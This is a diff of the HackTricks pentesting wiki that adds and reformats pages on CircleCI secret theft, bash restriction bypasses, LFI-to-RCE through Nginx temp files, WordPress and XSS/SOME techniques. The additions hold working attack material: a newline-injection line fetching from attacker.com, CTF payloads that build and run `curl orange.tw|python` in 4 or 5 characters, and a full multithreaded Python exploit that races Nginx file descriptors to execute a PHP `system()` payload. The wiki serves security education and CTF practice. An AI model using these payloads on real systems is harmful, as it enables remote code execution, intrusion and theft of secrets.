GitBook: [#3276] No subject

SUMMARY.md

@@ -511,6 +511,7 @@
 * [XSS (Cross Site Scripting)](pentesting-web/xss-cross-site-scripting/README.md)
   * [PDF Injection](pentesting-web/xss-cross-site-scripting/pdf-injection.md)
   * [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
+  * [SOME - Same Origin Method Execution](pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md)
   * [Debugging Client Side JS](pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md)
   * [Server Side XSS (Dynamic PDF)](pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
   * [XSS Tools](pentesting-web/xss-cross-site-scripting/xss-tools.md)

cloud-security/circleci.md

@@ -1,4 +1,4 @@
-
+# CircleCI
 
 <details>
 
@@ -16,27 +16,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# Basic Information
+## Basic Information
 
 [**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
 
-# Permissions
+## Permissions
 
 **CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
 In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
 
 However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
 
-# Env Variables & Secrets
+## Env Variables & Secrets
 
-According to [**the docs**](https://circleci.com/docs/2.0/env-vars/#) there are different ways to **load values in environment variables** inside a workflow.
+According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
 
-## Built-in env variables
+### Built-in env variables
 
 Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
 
-## Clear text
+### Clear text
 
 You can declare them in clear text inside a **command**:
 
@@ -80,18 +79,18 @@ jobs:
                     SECRET: A secret
 ```
 
-## Project Secrets
+### Project Secrets
 
 These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
 You can see them **declared in** _https://app.circleci.com/settings/project/github/\<org\_name>/\<repo\_name>/environment-variables_
 
-![](<../.gitbook/assets/image (662) (1).png>)
+![](<../.gitbook/assets/image (662) (1) (1).png>)
 
 {% hint style="danger" %}
 The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
 {% endhint %}
 
-## Context Secrets
+### Context Secrets
 
 These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
 
@@ -102,17 +101,17 @@ However, note that a different group (instead of All members) can be **selected
 This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
 {% endhint %}
 
-# Attacks
+## Attacks
 
-## Search Clear Text Secrets
+### Search Clear Text Secrets
 
 If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
 
-## Secret Env Vars & Context enumeration
+### Secret Env Vars & Context enumeration
 
 Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\<org\_name>/contexts_.
 
-## Exfiltrate Project secrets
+### Exfiltrate Project secrets
 
 {% hint style="warning" %}
 In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
@@ -172,7 +171,7 @@ workflows:
       - exfil-env
 ```
 
-## Exfiltrate Context Secrets
+### Exfiltrate Context Secrets
 
 You need to **specify the context name** (this will also exfiltrate the project secrets):
 
@@ -233,7 +232,7 @@ workflows:
 Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
 {% endhint %}
 
-## Escape to Cloud
+### Escape to Cloud
 
 **CircleCI** gives you the option to run **your builds in their machines or in your own**.\
 By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
@@ -262,7 +261,7 @@ jobs:
           version: 19.03.13
 ```
 
-## Persistence
+### Persistence
 
 * It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
   * _https://app.circleci.com/settings/user/tokens_
@@ -275,7 +274,6 @@ jobs:
 * If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
 * You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -291,5 +289,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

cloud-security/gitea-security/basic-gitea-information.md

@@ -1,4 +1,4 @@
-
+# Basic Gitea Information
 
 <details>
 
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# Basic Structure
+## Basic Structure
 
 The basic gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
 
@@ -27,9 +26,9 @@ A user may also be **part of different teams** with different permissions over d
 
 And finally **repositories may have special protection mechanisms**.
 
-# Permissions
+## Permissions
 
-## Organizations
+### Organizations
 
 When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
 
@@ -51,7 +50,7 @@ When creating a new team, several important settings are selected:
 
 ![](<../../.gitbook/assets/image (648) (1).png>)
 
-## Teams & Users
+### Teams & Users
 
 In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
 
@@ -59,35 +58,35 @@ In a repo, the **org admin** and the **repo admins** (if allowed by the org) can
 * Write
 * Read
 
-# Gitea Authentication
+## Gitea Authentication
 
-## Web Access
+### Web Access
 
 Using **username + password** and potentially (and recommended) a 2FA.
 
-## **SSH Keys**
+### **SSH Keys**
 
 You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
 
-### **GPG Keys**
+#### **GPG Keys**
 
 You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
 
-## **Personal Access Tokens**
+### **Personal Access Tokens**
 
 You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
 
-## Oauth Applications
+### Oauth Applications
 
 Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
 
-![](<../../.gitbook/assets/image (662).png>)
+![](<../../.gitbook/assets/image (662) (1).png>)
 
-## Deploy keys
+### Deploy keys
 
 Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
 
-# Branch Protections
+## Branch Protections
 
 Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
 
@@ -117,8 +116,6 @@ Different protections can be applied to a branch (like to master):
 As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
 {% endhint %}
 
-
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -134,5 +131,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

cloud-security/workspace-security.md

@@ -102,7 +102,7 @@ If someone creates a **copy** of that **document** that **contained the App Scri
 
 This method will be able to bypass also the Workspace admin restriction:
 
-![](<../.gitbook/assets/image (662) (1) (1) (1).png>)
+![](<../.gitbook/assets/image (662) (1) (1) (1) (1).png>)
 
 But can be prevented with:
 

linux-hardening/useful-linux-commands/bypass-bash-restrictions.md

@@ -163,6 +163,99 @@ You could use **burpcollab** or [**pingb**](http://pingb.in) for example.
 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
 ```
 
+### Bypass potential regexes
+
+```bash
+# A regex that only allow letters and numbers migth be vulnerable to new line characters
+1%0a`curl http://attacker.com`
+```
+
+### RCE with 5 chars
+
+```bash
+# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
+#Oragnge Tsai solution
+## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
+http://host/?cmd=>ls\
+http://host/?cmd=ls>_
+http://host/?cmd=>\ \
+http://host/?cmd=>-t\
+http://host/?cmd=>\>g
+http://host/?cmd=ls>>_
+
+## Step2: generate `curl orange.tw|python` to file "g"
+## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
+http://host/?cmd=>on
+http://host/?cmd=>th\
+http://host/?cmd=>py\
+http://host/?cmd=>\|\
+http://host/?cmd=>tw\
+http://host/?cmd=>e.\
+http://host/?cmd=>ng\
+http://host/?cmd=>ra\
+http://host/?cmd=>o\
+http://host/?cmd=>\ \
+http://host/?cmd=>rl\
+http://host/?cmd=>cu\
+http://host/?cmd=sh _
+# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
+
+## Finally execute the file "g"
+http://host/?cmd=sh g
+
+
+# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
+# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
+https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
+## Execute tar command over a folder
+http://52.199.204.34/?cmd=>tar
+http://52.199.204.34/?cmd=>zcf
+http://52.199.204.34/?cmd=>zzz
+http://52.199.204.34/?cmd=*%20/h*
+
+# Another curiosity if you can read files of the current folder
+ln /f*
+## If there is a file /flag.txt that will create a hard link 
+## to it in the current folder
+```
+
+### RCE with 4 chars
+
+```bash
+# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
+# it will follow the same principle of creating the command `ls -t>g` in a file
+# and then generate the full command in filenames
+# generate "g> ht- sl" to file "v"
+'>dir'
+'>sl'
+'>g\>'
+'>ht-'
+'*>v'
+
+# reverse file "v" to file "x", content "ls -th >g"
+'>rev'
+'*v>x'
+
+# generate "curl orange.tw|python;"
+'>\;\\'
+'>on\\'
+'>th\\'
+'>py\\'
+'>\|\\'
+'>tw\\'
+'>e.\\'
+'>ng\\'
+'>ra\\'
+'>o\\'
+'>\ \\'
+'>rl\\'
+'>cu\\'
+
+# got shell
+'sh x'
+'sh g'
+```
+
 ## Read-Only/Noexec Bypass
 
 If you are inside a filesystem with the **read-only and noexec protections** there are still ways to **execute arbitrary binaries**. One of them is by the use of **DDexec**, yo can find an explanation of the technique in:

network-services-pentesting/pentesting-web/wordpress.md

@@ -299,6 +299,15 @@ Through Security Skills as a Service, we help organizations to **defend against
 {% embed url="https://securityhubs.io/" %}
 {% endhint %}
 
+## Get access by overwriting a bit
+
+More than a real attack this is a curiosity. IN the CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) you could flip 1 bit from any wordpress file. So you could flip the position `5389` of the file `/var/www/html/wp-includes/user.php` to NOP the NOT (`!`) operation.
+
+```php
+    if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
+            return new WP_Error(
+```
+
 ## **Panel RCE**
 
 **Modifying a php from the theme used (admin credentials needed)**

pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md

@@ -1,4 +1,4 @@
-
+# LFI2RCE via Nginx temp files
 
 <details>
 
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# Vulnerable configuration
+## Vulnerable configuration
 
 * PHP code:
 
@@ -85,7 +84,7 @@ lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001
 
 Note: One cannot directly include `/proc/34/fd/15` in this example as PHP's `include` function would resolve the path to `/var/lib/nginx/body/0000001368 (deleted)` which doesn't exist in in the filesystem. This minor restriction can luckily be bypassed by some indirection like: `/proc/self/fd/34/../../../34/fd/15` which will finally execute the content of the deleted `/var/lib/nginx/body/0000001368` file.
 
-# Full Exploit
+## Full Exploit
 
 ```python
 #!/usr/bin/env python3
@@ -184,17 +183,117 @@ $ ./pwn.py 127.0.0.1 1337
 [!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)
 ```
 
-# Labs
+### Another Exploit
+
+This is from [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/)
+
+```python
+import requests
+import threading
+import multiprocessing
+import threading
+import random
+
+SERVER = "http://localhost:8088"
+NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
+# Set the following to True to use the above set of PIDs instead of scanning:
+USE_NGINX_PIDS_CACHE = False
+
+def create_requests_session():
+    session = requests.Session()
+    # Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead
+    adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
+    session.mount('http://', adapter)
+    return session
+
+def get_nginx_pids(requests_session):
+    if USE_NGINX_PIDS_CACHE:
+        return NGINX_PIDS_CACHE
+    nginx_pids = set()
+    # Scan up to PID 200
+    for i in range(1, 200):
+        cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
+        if cmdline.startswith("nginx: worker process"):
+            nginx_pids.add(i)
+    return nginx_pids
+
+def send_payload(requests_session, body_size=1024000):
+    try:
+        # The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast
+        payload = '<?php system("/readflag"); ?> //'
+        requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
+    except:
+        pass
+
+def send_payload_worker(requests_session):
+    while True:
+        send_payload(requests_session)
+
+def send_payload_multiprocess(requests_session):
+    # Use all CPUs to send the payload as request body for Nginx
+    for _ in range(multiprocessing.cpu_count()):
+        p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
+        p.start()
+
+def generate_random_path_prefix(nginx_pids):
+    # This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
+    path = ""
+    component_num = random.randint(0, 10)
+    for _ in range(component_num):
+        pid = random.choice(nginx_pids)
+        if random.randint(0, 1) == 0:
+            path += f"/proc/{pid}/cwd"
+        else:
+            path += f"/proc/{pid}/root"
+    return path
+
+def read_file(requests_session, nginx_pid, fd, nginx_pids):
+    nginx_pid_list = list(nginx_pids)
+    while True:
+        path = generate_random_path_prefix(nginx_pid_list)
+        path += f"/proc/{nginx_pid}/fd/{fd}"
+        try:
+            d = requests_session.get(SERVER + f"/?action=include&file={path}").text
+        except:
+            continue
+        # Flags are formatted as hxp{<flag>}
+        if "hxp" in d:
+            print("Found flag! ")
+            print(d)
+
+def read_file_worker(requests_session, nginx_pid, nginx_pids):
+    # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
+    for fd in range(10, 45):
+        thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
+        thread.start()
+
+def read_file_multiprocess(requests_session, nginx_pids):
+    for nginx_pid in nginx_pids:
+        p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
+        p.start()
+
+if __name__ == "__main__":
+    print('[DEBUG] Creating requests session')
+    requests_session = create_requests_session()
+    print('[DEBUG] Getting Nginx pids')
+    nginx_pids = get_nginx_pids(requests_session)
+    print(f'[DEBUG] Nginx pids: {nginx_pids}')
+    print('[DEBUG] Starting payload sending')
+    send_payload_multiprocess(requests_session)
+    print('[DEBUG] Starting fd readers')
+    read_file_multiprocess(requests_session, nginx_pids)
+```
+
+## Labs
 
 * [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
 * [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
 * [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
 
-# References
+## References
 
 * [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -210,5 +309,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

pentesting-web/h2c-smuggling.md

@@ -71,7 +71,7 @@ Follow this link for[ **more info about this vulnerability in Nginx**](../networ
 
 Similar to previous technique, this one **instead** of creating a **HTTP2 tunnel** to an endpoint accessible via a proxy, it will create a **Websocket tunnel** for the same purpose, **bypass potential proxies limitations** and talk directly to the endpoint:
 
-![](<../.gitbook/assets/image (651).png>)
+![](<../.gitbook/assets/image (651) (2).png>)
 
 ### Scenario 1
 

pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md

@@ -46,7 +46,7 @@ This technique was abused on AWS load balancer, so making sure that the users ac
 
 This is exactly the same technique as before, but checking the requests James noticed that clients were asking to send him their credentials, so he just modified his server to allow CORS to send him peoples credentials:
 
-![](<../../.gitbook/assets/image (662) (1) (1) (1) (1).png>)
+![](<../../.gitbook/assets/image (662) (1) (1) (1) (1) (1).png>)
 
 ### H2.TE via Request Header Injection
 

pentesting-web/xss-cross-site-scripting/README.md

@@ -48,6 +48,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
          2. Can you escape the string and execute different JS code?
          3. Are your input in template literals \`\`?
          4. Can you bypass protections?
+      4. Javascript **function** being **executed**
+         1. You can indicate the name of the function to execute. e.g.: `?callback=alert(1)`
 4. If **used**:
    1. You could exploit a **DOM XSS**, pay attention how your input is controlled and if your **controlled input is used by any sink.**
 
@@ -94,6 +96,40 @@ In this case your input is reflected between **`<script> [...] </script>`** tags
   * `\';alert(1)//`
 * If reflected inside template literals \`\` you can **embed JS expressions** using `${ ... }` syntax: `` `var greetings = ``Hello, ${alert(1)}\`\`\`
 
+### Javascript Function
+
+Several web pages have endpoints that **accept as parameter the name of the function to execute**. A common example to see in the wild is something like: `?callback=callbackFunc`.
+
+A good way to find out if something given directly by the user is trying to be executed is **modifying the param value** (for example to 'Vulnerable') and looking in the console for errors like:
+
+![](<../../.gitbook/assets/image (651).png>)
+
+In case it's vulnerable, you could be able to **trigger an alert** just doing sending the value: **`?callback=alert(1)`**. However, it' very common that this endpoints will **validate the content** to only allow letters, numbers, dots and underscores (**`[\w\._]`**).
+
+However, even with that limitation it's still possible to perform some actions. This is because you can use that valid chars to **access any element in the DOM**:
+
+![](<../../.gitbook/assets/image (662).png>)
+
+Some useful functions for this:
+
+```
+firstElementChild
+lastElementChild
+nextElementSibiling
+lastElementSibiling
+parentElement
+```
+
+You can also try to **trigger Javascript functions** directly: `obj.sales.delOrders`.
+
+However, usually the endpoints executing the indicated function are endpoints without much interesting DOM, **other pages in the same origin** will have a **more interesting DOM** to perform more actions.
+
+Therefore, in order to **abuse this vulnerability in a different DOM** the **Same Origin Method Execution (SOME)** exploitation was developed:
+
+{% content-ref url="some-same-origin-method-execution.md" %}
+[some-same-origin-method-execution.md](some-same-origin-method-execution.md)
+{% endcontent-ref %}
+
 ### DOM
 
 There is **JS code** that is using **unsafely** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
@@ -688,6 +724,10 @@ If you find that you can **inject headers in a 302 Redirect response** you could
 In [**this report**](https://www.gremwell.com/firefox-xss-302) and [**this one**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) you can read how you can test several protocols inside the Location header and see if any of them allows the browser to inspect and execute the XSS payload inside the body.\
 Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location header_, `resource://`.
 
+### Only Letters, Numbers and Dots
+
+If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](./#javascript-function) to find how to abuse this behaviour.
+
 ### Obfuscation & Advanced Bypass
 
 * [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)

pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md

@@ -0,0 +1,69 @@
+# SOME - Same Origin Method Execution
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>
+
+## Same Origin Method Execution
+
+There will be occasions where you can execute some limited javascript in a page. For example, in the case where you can[ **control a callback value that will be executed**](./#javascript-function).
+
+In those case, one of the best things that you could do is to **access the DOM to call whatever** sensitive action you can find in there (like clicking a button). However, usually you will find this vulnerability in **small endpoints without any interesting thing in the DOM**.
+
+In those scenarios, this attack will be very useful, because its goal is to be able to **abuse the limited JS execution inside a DOM from a different page from the same domain** with much interesting actions.
+
+Basically the attack flow is the following:
+
+* Find a **callback that you can abuse** (potentially limited to \[\w\\.\_]).
+  * If it's not limited and you can execute any JS, you could just abuse this as a regular XSS
+* Make the **victim open a page** controlled by the **attacker**
+* The **page will open itself** in a **different window** (the new window will have the object **`opener`** referencing the initial one)
+* The **initial page** will load the **page** where the **interesting DOM** is located.
+* The **second page** will load the **vulnerable page abusing the callback** and using the **`opener`** object to **access and execute some action in the initial page** (which now contains the interesting DOM).
+
+{% hint style="danger" %}
+Note that even if the initial page access to a new URL after having created the second page, the **`opener` object of the second page is still a valid reference to the first page in the new DOM**.
+{% endhint %}
+
+### Exploitation
+
+You can use this form to **generate a PoC** to exploit this type of vulnerability: [https://www.someattack.com/Playground/SOMEGenerator](https://www.someattack.com/Playground/SOMEGenerator)
+
+In order to find a DOM path to a HTML element with a click you can use this browser extension: [https://www.someattack.com/Playground/targeting\_tool](https://www.someattack.com/Playground/targeting\_tool)
+
+### Example
+
+* You can find a vulnerable example in [https://www.someattack.com/Playground/](https://www.someattack.com/Playground/)
+  * Note that in this example the server is **generating javascript code** and **adding** it to the HTML based on the **content of the callback parameter:** `<script>opener.{callbacl_content}</script>` . Thats why in this example you don't need to indicate the use of `opener` explicitly.
+
+## References
+
+* [https://conference.hitb.org/hitbsecconf2017ams/sessions/everybody-wants-some-advance-same-origin-method-execution/](https://conference.hitb.org/hitbsecconf2017ams/sessions/everybody-wants-some-advance-same-origin-method-execution/)
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>

todo/hardware-hacking/radio.md

@@ -1,4 +1,4 @@
-
+# Radio
 
 <details>
 
@@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# SigDigger
+## SigDigger
 
 [**SigDigger** ](https://github.com/BatchDrake/SigDigger)is a free digital signal analyzer for GNU/Linux and macOS, designed to extract information of unknown radio signals. It supports a variety of SDR devices through SoapySDR, and allows adjustable demodulation of FSK, PSK and ASK signals, decode analog video, analyze bursty signals and listen to analog voice channels (all in real time).
 
-## Basic Config
+### Basic Config
 
 After installing there are a few things that you could consider configuring.\
 In settings (the second tab button) you can select the **SDR device** or **select a file** to read and which frequency to syntonise and the Sample rate (recommended to up to 2.56Msps if your PC support it)\\
@@ -36,7 +35,7 @@ In the GUI behaviour it's recommended to enable a few things if your PC support
 If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.
 {% endhint %}
 
-## Uses
+### Uses
 
 * Just to **capture some time of a signal and analyze it** just maintain the button "Push to capture" as long as you need.
 
@@ -46,13 +45,13 @@ If you realise that your PC is not capturing things try to disable OpenGL and lo
 
 ![](<../../.gitbook/assets/image (658).png>)
 
-## Synchronize with radio channel
+### Synchronize with radio channel
 
 With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with the channel you want to hear, configure "Baseband audio preview" option, configure the bandwith to get all the info being sent and then set the Tuner to the level before the noise is really starting to increase:
 
 ![](<../../.gitbook/assets/image (389).png>)
 
-# Interesting tricks
+## Interesting tricks
 
 * When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
 * In frames of information you usually should **find different frames well aligned between them**:
@@ -64,7 +63,7 @@ With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with t
 * **After recovering the bits you might need to process them someway**. For example, in Manchester codification a up+down will be a 1 or 0 and a down+up will be the other one. So pairs of 1s and 0s (ups and downs) will be a real 1 or a real 0.
 * Even if a signal is using Manchester codification (it's impossible to find more than two 0s or 1s in a row), you might **find several 1s or 0s together in the preamble**!
 
-## Uncovering modulation type with IQ
+### Uncovering modulation type with IQ
 
 There are 3 ways to store information in signals: Modulating the **amplitude**, **frequency** or **phase**.\
 If you are checking a signal there are different ways to try to figure out what is being used to store information (fin more ways below) but a good one is to check the IQ graph.
@@ -78,13 +77,13 @@ If you are checking a signal there are different ways to try to figure out what
   Therefore, to identify FM, you should **only see basically a circle** in this graph.\
   Moreover, a different frequency is "represented" by the IQ graph by a **speed acceleration across the circle** (so in SysDigger selecting the signal the IQ graph is populated, if you find an acceleration or change of direction in the created circle it could mean that this is FM):
 
-# AM Example
+## AM Example
 
 {% file src="../../.gitbook/assets/sigdigger_20220308_165547Z_2560000_433500000_float32_iq.raw" %}
 
-## Uncovering AM
+### Uncovering AM
 
-### Checking the envelope
+#### Checking the envelope
 
 Checking AM info with [**SigDigger** ](https://github.com/BatchDrake/SigDigger)and just looking at the **envelop** you can see different clear amplitude levels. The used signal is sending pulses with information in AM, this is how one pulse looks like:
 
@@ -94,7 +93,7 @@ And this is how part of the symbol looks like with the waveform:
 
 ![](<../../.gitbook/assets/image (650) (1).png>)
 
-### Checking the Histogram
+#### Checking the Histogram
 
 You can **select the whole signal** where information is located, select **Amplitude** mode and **Selection** and click on **Histogram.** You can observer that 2 clear levels are only found
 
@@ -106,27 +105,27 @@ For example, if you select Frequency instead of Amplitude in this AM signal you
 
 If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.
 
-### With IQ
+#### With IQ
 
 In this example you can see how there is a **big circle** but also **a lot of points in the centre.**
 
 ![](<../../.gitbook/assets/image (640).png>)
 
-## Get Symbol Rate
+### Get Symbol Rate
 
-### With one symbol
+#### With one symbol
 
 Select the smallest symbol you can find (so you are sure it's just 1) and check the "Selection freq". I this case it would be 1.013kHz (so 1kHz).
 
 ![](<../../.gitbook/assets/image (638) (1).png>)
 
-### With a group of symbols
+#### With a group of symbols
 
 You can also indicate the number of symbols you are going to select and SigDigger will calculate the frequency of 1 symbol (the more symbols selected the better probably). In this scenario I selected 10 symbols and the "Selection freq" is 1.004 Khz:
 
 ![](<../../.gitbook/assets/image (635).png>)
 
-## Get Bits
+### Get Bits
 
